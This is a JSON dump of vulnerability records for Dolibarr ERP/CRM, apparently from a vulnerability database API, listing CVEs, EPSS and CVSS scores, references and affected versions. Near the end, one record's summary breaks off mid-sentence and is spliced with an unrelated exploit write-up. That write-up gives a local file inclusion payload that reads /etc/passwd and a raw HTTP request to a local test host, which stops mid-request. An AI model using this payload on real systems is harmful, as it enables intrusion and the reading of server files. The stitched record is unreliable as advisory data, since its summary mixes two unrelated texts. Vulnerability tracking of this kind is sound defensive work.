"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-7cm4-vmf2-8wf2"}],"fixed_packages":[],"aliases":["CVE-2022-40871","GHSA-7cm4-vmf2-8wf2"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-5ykc-55w1-3ka4"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/208266?format=json","vulnerability_id":"VCID-5ynu-3t27-kuhq","summary":"Improper Authorization in dolibarr/dolibarr","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-0731","reference_id":"","reference_type":"","scores":[{"value":"0.00135","scoring_system":"epss","scoring_elements":"0.33363","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00135","scoring_system":"epss","scoring_elements":"0.33182","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-0731"},{"reference_url":"https://github.com/dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/dolibarr/dolibarr"},{"reference_url":"https://github.com/dolibarr/dolibarr/commit/209ab708d4b65fbd88ba4340d60b7822cb72651a","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/dolibarr/dolibarr/commit/209ab708d4b65fbd88ba4340d60b7822cb72651a"},{"reference_url":"https://huntr.dev/bounties/e242ab4e-fc70-4b2c-a42d-5b3ee4895de8","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://huntr.dev/bounties/e242ab4e-fc70-4b2c-a42d-5b3ee4895de8"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-0731","reference_id":"CVE-2022-0731","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-0731"},{"reference_url":"https://github.com/advisories/GHSA-4xc7-x2jr-cr74","reference_id":"GHSA-4xc7-x2jr-cr74","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-4xc7-x2jr-cr74"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/19494?format=json","purl":"pkg:composer/dolibarr/dolibarr@16.0.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-bjem-6exd-9kf2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@16.0.0"}],"aliases":["CVE-2022-0731","GHSA-4xc7-x2jr-cr74"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-5ynu-3t27-kuhq"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/204425?format=json","vulnerability_id":"VCID-6ksc-hyaq-gud6","summary":"XSS in Dolibarr ERP & CRM","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2020-7996","reference_id":"","reference_type":"","scores":[{"value":"0.00365","scoring_system":"epss","scoring_elements":"0.59019","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00365","scoring_system":"epss","scoring_elements":"0.58908","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2020-7996"},{"reference_url":"https://github.com/tufangungor/tufangungor.github.io/blob/master/_posts/2020-01-19-dolibarr-10.0.6-xss-in-http-header.md","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/tufangungor/tufangungor.github.io/blob/master/_posts/2020-01-19-dolibarr-10.0.6-xss-in-http-header.md"},{"reference_url":"https://tufangungor.github.io/exploit/2020/01/18/dolibarr-10.0.6-xss-in-http-header.html","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://tufangungor.github.io/exploit/2020/01/18/dolibarr-10.0.6-xss-in-http-header.html"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2020-7996","reference_id":"CVE-2020-7996","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2020-7996"},{"reference_url":"https://github.com/advisories/GHSA-v384-jqmq-fc74","reference_id":"GHSA-v384-jqmq-fc74","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-v384-jqmq-fc74"}],"fixed_packages":[],"aliases":["CVE-2020-7996","GHSA-v384-jqmq-fc74"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-6ksc-hyaq-gud6"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/49790?format=json","vulnerability_id":"VCID-6mqr-g619-dqbu","summary":"A Reflected Cross-site scripting (XSS) vulnerability located in htdocs/compta/paiement/card.php of Dolibarr before 19.0.2 allows remote attackers to inject arbitrary web script or HTML via a crafted payload injected into the facid parameter.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-34051","reference_id":"","reference_type":"","scores":[{"value":"0.00966","scoring_system":"epss","scoring_elements":"0.7699","published_at":"2026-06-11T12:55:00Z"},{"value":"0.00966","scoring_system":"epss","scoring_elements":"0.77061","published_at":"2026-06-12T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-34051"},{"reference_url":"https://blog.smarttecs.com/posts/2024-004-cve-2024-34051","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://blog.smarttecs.com/posts/2024-004-cve-2024-34051"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/3a3ccc253b8eceddee84f158b2c262a4033b9402","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/3a3ccc253b8eceddee84f158b2c262a4033b9402"},{"reference_url":"https://blog.smarttecs.com/posts/2024-004-cve-2024-34051/","reference_id":"2024-004-cve-2024-34051","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-08-20T15:43:14Z/"}],"url":"https://blog.smarttecs.com/posts/2024-004-cve-2024-34051/"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-34051","reference_id":"CVE-2024-34051","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-34051"},{"reference_url":"https://github.com/advisories/GHSA-hv2j-6654-x74q","reference_id":"GHSA-hv2j-6654-x74q","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-hv2j-6654-x74q"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/31892?format=json","purl":"pkg:composer/dolibarr/dolibarr@19.0.2","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@19.0.2"}],"aliases":["CVE-2024-34051","GHSA-hv2j-6654-x74q"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-6mqr-g619-dqbu"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/72301?format=json","vulnerability_id":"VCID-76rs-x78m-1fg6","summary":"A security flaw has been discovered in Dolibarr ERP CRM up to 23.0.2. This vulnerability affects the function dol_verifyHash in the library htdocs/core/lib/security.lib.php of the component Online Signature Module. The manipulation results in improper verification of cryptographic signature. The attack may be performed from remote. Attacks of this nature are highly complex. It is stated that the exploitability is difficult. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-7689","reference_id":"","reference_type":"","scores":[{"value":"9e-05","scoring_system":"epss","scoring_elements":"0.01014","published_at":"2026-06-12T12:55:00Z"},{"value":"9e-05","scoring_system":"epss","scoring_elements":"0.01017","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-7689"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-7689","reference_id":"","reference_type":"","scores":[{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"2.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-7689"},{"reference_url":"https://vuldb.com/vuln/360859","reference_id":"360859","reference_type":"","scores":[{"value":"2.6","scoring_system":"cvssv2","scoring_elements":"AV:N/AC:H/Au:N/C:N/I:P/A:N/E:POC/RL:ND/RC:UR"},{"value":"3.7","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R"},{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R"},{"value":"2.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-04T13:07:21Z/"}],"url":"https://vuldb.com/vuln/360859"},{"reference_url":"https://vuldb.com/submit/801794","reference_id":"801794","reference_type":"","scores":[{"value":"2.6","scoring_system":"cvssv2","scoring_elements":"AV:N/AC:H/Au:N/C:N/I:P/A:N/E:POC/RL:ND/RC:UR"},{"value":"3.7","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R"},{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R"},{"value":"2.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-04T13:07:21Z/"}],"url":"https://vuldb.com/submit/801794"},{"reference_url":"https://vuldb.com/vuln/360859/cti","reference_id":"cti","reference_type":"","scores":[{"value":"2.6","scoring_system":"cvssv2","scoring_elements":"AV:N/AC:H/Au:N/C:N/I:P/A:N/E:POC/RL:ND/RC:UR"},{"value":"3.7","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R"},{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R"},{"value":"2.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-04T13:07:21Z/"}],"url":"https://vuldb.com/vuln/360859/cti"},{"reference_url":"https://gist.github.com/Shaon-Xis/d6ae069fc54f006457b68a91d5a8e158","reference_id":"d6ae069fc54f006457b68a91d5a8e158","reference_type":"","scores":[{"value":"2.6","scoring_system":"cvssv2","scoring_elements":"AV:N/AC:H/Au:N/C:N/I:P/A:N/E:POC/RL:ND/RC:UR"},{"value":"3.7","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R"},{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R"},{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"2.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-04T13:07:21Z/"}],"url":"https://gist.github.com/Shaon-Xis/d6ae069fc54f006457b68a91d5a8e158"},{"reference_url":"https://github.com/advisories/GHSA-jggh-5rmh-r6h5","reference_id":"GHSA-jggh-5rmh-r6h5","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-jggh-5rmh-r6h5"}],"fixed_packages":[],"aliases":["CVE-2026-7689","GHSA-jggh-5rmh-r6h5"],"risk_score":2.9,"exploitability":"0.5","weighted_severity":"5.7","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-76rs-x78m-1fg6"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/71461?format=json","vulnerability_id":"VCID-79w7-szqt-wfeq","summary":"In the Website module of Dolibarr ERP & CRM 22.0.4 and below, the application uses blacklist-based filtering to restrict dangerous PHP functions related to system command execution. An authenticated user with permission to edit PHP content can bypass this filtering, resulting in full remote code execution with the ability to execute arbitrary operating system commands on the server.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-31019","reference_id":"","reference_type":"","scores":[{"value":"0.00119","scoring_system":"epss","scoring_elements":"0.30662","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00119","scoring_system":"epss","scoring_elements":"0.30466","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-31019"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31019","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31019"},{"reference_url":"http://dolibarr.com","reference_id":"dolibarr.com","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T18:23:29Z/"}],"url":"http://dolibarr.com"},{"reference_url":"https://github.com/advisories/GHSA-j2g9-rprv-hrhc","reference_id":"GHSA-j2g9-rprv-hrhc","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-j2g9-rprv-hrhc"},{"reference_url":"https://github.com/PhDg1410/CVE/blob/main/CVE-2026-31019/README.md","reference_id":"README.md","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T18:23:29Z/"}],"url":"https://github.com/PhDg1410/CVE/blob/main/CVE-2026-31019/README.md"}],"fixed_packages":[],"aliases":["CVE-2026-31019","GHSA-j2g9-rprv-hrhc"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-79w7-szqt-wfeq"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/66743?format=json","vulnerability_id":"VCID-7g1w-ar9a-r7fb","summary":"Dolibarr is an enterprise resource planning (ERP) and customer relationship management (CRM) software package. In versions prior to 23.0.0 , the ODT to PDF conversion process in odf.php concatenates the MAIN_ODT_AS_PDF configuration constant directly into a shell command passed to exec() without sanitization. An authenticated administrator can inject arbitrary OS commands via this constant using command separators, achieving remote code execution as the web server user when any ODT template is generated. This issue has been fixed in version 23.0.0.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-23500","reference_id":"","reference_type":"","scores":[{"value":"0.00166","scoring_system":"epss","scoring_elements":"0.37487","published_at":"2026-06-11T12:55:00Z"},{"value":"0.00166","scoring_system":"epss","scoring_elements":"0.37665","published_at":"2026-06-12T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-23500"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-23500","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-23500"},{"reference_url":"https://github.com/Dolibarr/dolibarr/releases/tag/23.0.0","reference_id":"23.0.0","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-18T03:06:09Z/"}],"url":"https://github.com/Dolibarr/dolibarr/releases/tag/23.0.0"},{"reference_url":"https://github.com/advisories/GHSA-w5j3-8fcr-h87w","reference_id":"GHSA-w5j3-8fcr-h87w","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-w5j3-8fcr-h87w"},{"reference_url":"https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-w5j3-8fcr-h87w","reference_id":"GHSA-w5j3-8fcr-h87w","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-18T03:06:09Z/"}],"url":"https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-w5j3-8fcr-h87w"}],"fixed_packages":[],"aliases":["CVE-2026-23500","GHSA-w5j3-8fcr-h87w"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-7g1w-ar9a-r7fb"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/206961?format=json","vulnerability_id":"VCID-83c2-jnk3-mbau","summary":"Dolibarr Cross Site Scripting (XSS) vulnerability","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2021-42220","reference_id":"","reference_type":"","scores":[{"value":"0.00271","scoring_system":"epss","scoring_elements":"0.50966","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00271","scoring_system":"epss","scoring_elements":"0.50834","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2021-42220"},{"reference_url":"https://packetstormsecurity.com/files/164544/Dolibarr-ERP-CRM-14.0.2-Cross-Site-Scripting-Privilege-Escalation.html","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://packetstormsecurity.com/files/164544/Dolibarr-ERP-CRM-14.0.2-Cross-Site-Scripting-Privilege-Escalation.html"},{"reference_url":"https://truedigitalsecurity.com/advisory-summary-2021","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://truedigitalsecurity.com/advisory-summary-2021"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2021-42220","reference_id":"CVE-2021-42220","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2021-42220"},{"reference_url":"https://github.com/advisories/GHSA-jqfp-m5f8-vg28","reference_id":"GHSA-jqfp-m5f8-vg28","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-jqfp-m5f8-vg28"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/18363?format=json","purl":"pkg:composer/dolibarr/dolibarr@14.0.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1qr4-xs72-e3a2"},{"vulnerability":"VCID-3ny3-rj44-ffgf"},{"vulnerability":"VCID-44tq-zhx1-8beb"},{"vulnerability":"VCID-4cfp-8g13-k7bd"},{"vulnerability":"VCID-5ykc-55w1-3ka4"},{"vulnerability":"VCID-5ynu-3t27-kuhq"},{"vulnerability":"VCID-6mqr-g619-dqbu"},{"vulnerability":"VCID-76rs-x78m-1fg6"},{"vulnerability":"VCID-79w7-szqt-wfeq"},{"vulnerability":"VCID-7g1w-ar9a-r7fb"},{"vulnerability":"VCID-9f3a-9c5y-juf1"},{"vulnerability":"VCID-aeaq-1k3n-y7h1"},{"vulnerability":"VCID-az9a-3z2g-9kht"},{"vulnerability":"VCID-azy5-es2r-yyex"},{"vulnerability":"VCID-bthp-4km9-ekhz"},{"vulnerability":"VCID-cjmf-3m54-x3af"},{"vulnerability":"VCID-en1t-b8gx-6bgt"},{"vulnerability":"VCID-f3k5-kjua-mqes"},{"vulnerability":"VCID-h4pr-kj49-xfhb"},{"vulnerability":"VCID-k1fz-zvje-17ga"},{"vulnerability":"VCID-n6mk-74qs-6bfw"},{"vulnerability":"VCID-pn1n-de3e-uufv"},{"vulnerability":"VCID-qrcn-mrfx-xyb2"},{"vulnerability":"VCID-rjd3-a1ds-skdp"},{"vulnerability":"VCID-rtec-tutp-m3ep"},{"vulnerability":"VCID-spzz-de9a-g3gw"},{"vulnerability":"VCID-t393-s4zx-uyhs"},{"vulnerability":"VCID-tfxu-34ku-6uce"},{"vulnerability":"VCID-vxpt-gdg8-r7dc"},{"vulnerability":"VCID-wtcs-fcvg-dkgm"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@14.0.3"}],"aliases":["CVE-2021-42220","GHSA-jqfp-m5f8-vg28"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-83c2-jnk3-mbau"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/129720?format=json","vulnerability_id":"VCID-9f3a-9c5y-juf1","summary":"Dolibarr before 17.0.1 allows remote code execution by an authenticated user via an uppercase manipulation: perms`, the `dol_eval()` method will be called. Following the `dol_eval()` method, we can see that it will filter the dangerous php functions in `$menu->perms` through the blacklist set in `$forbiddenphpfunctions`:\n\n![](https://raw.githubusercontent.com/wh0amitx/Misc/main/images/image-20240228164725548.png)\n\nHowever, the blacklist here is not comprehensive. For example, the `include_once` and `require_once` functions can easily pass the blacklist check, which will cause file inclusion vulnerabilities. Moreover, if the `allow_url_include` option is enabled in php.ini, arbitrary code execution will occur. **The most serious thing is that we can cooperate with the file upload at `/htdocs/user/document.php?id=1&uploadform=1` to achieve more general arbitrary code execution.**\n\n# Proof of Concept\n\n## Local File Inclusion\n\n(1) First, create a Menu and set \"Permissions\" to `include_once('/etc/passwd')` (note that `''` must be used here because `\"` will be detected):\n\n```http\nPOST /htdocs/admin/menus/edit.php?action=add&token=fae63868ce9c2a7eece04a49ffdbe23f&menuId=0 HTTP/1.1\nHost: 192.168.31.31\nContent-Length: 210\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nOrigin: http://192.168.31.31\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\nReferer: http://192.168.31.31/htdocs/admin/menus/edit.php?menuId=0&action=create&menu_handler=all&backtopage=%2Fhtdocs%2Fadmin%2Fmenus%2Findex.php\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,ru;q=0.7,ja;q=0.6\nCookie: DOLSESSID_cc5001a0224d79c07308a0908c6213b79e5d7d10=82ef3f1d798bf58a0e11c0cbacc390dd\nConnection: 